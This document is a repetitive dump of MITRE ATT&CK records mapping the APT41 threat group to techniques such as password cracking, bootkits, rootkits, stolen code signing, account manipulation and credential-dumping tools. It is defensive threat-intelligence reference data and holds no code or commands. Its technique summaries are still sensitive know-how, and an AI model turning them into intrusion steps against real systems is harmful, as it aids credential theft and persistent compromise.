external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--79958036-a8bf-4808-af4f-f9f7a9cb6e7c
revoked : False
technique : Password Cracking
technique_description : Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) 

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1110.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'Network']
data_sources : ['User Account: User Account Authentication', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--48132286-7b7d-42cf-956b-95c75eeff1e3
revoked : False
technique : Bootkit
technique_description : Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1542.003
matrix : mitre-attack
platform : ['Linux', 'Windows']
data_sources : ['Drive: Drive Modification']
permissions_required : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--1be07717-ad08-4364-9a58-b44a95a389a5
revoked : False
technique : Rootkit
technique_description : Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1014
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Drive: Drive Modification', 'Firmware: Firmware Modification', 'File: File Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--3213e4e5-c3e4-4d51-8dce-929248f2882b
revoked : False
technique : Code Signing
technique_description : Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1553.002
matrix : mitre-attack
platform : ['macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has added user accounts to the User and Admin groups.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--373f6762-cda6-4ce7-894f-cac31a09a98b
revoked : False
technique : Account Manipulation
technique_description : Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1098
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'SaaS', 'Network', 'Containers']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Active Directory: Active Directory Object Modification', 'File: File Modification', 'Group: Group Modification', 'User Account: User Account Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [pwdump](https://attack.mitre.org/software/S0006), [PowerSploit](https://attack.mitre.org/software/S0194), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--35f5f7b9-8b86-4390-9f99-1d56aa1ae32a
revoked : False
technique : Tool
technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--54f6c1c8-f3c7-44a6-9a00-2195e03cf0ae
revoked : False
technique : Data from Local System
technique_description : Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Process: OS API Execution', 'Script: Script Execution', 'Command: Command Execution', 'Process: Process Creation', 'File: File Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--fce88056-31db-43be-be76-fb1aaf076ed1
revoked : False
technique : Masquerade Task or Service
technique_description : Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.004
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS']
data_sources : ['Scheduled Job: Scheduled Job Modification', 'Service: Service Creation', 'Command: Command Execution', 'Service: Service Metadata', 'Scheduled Job: Scheduled Job Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
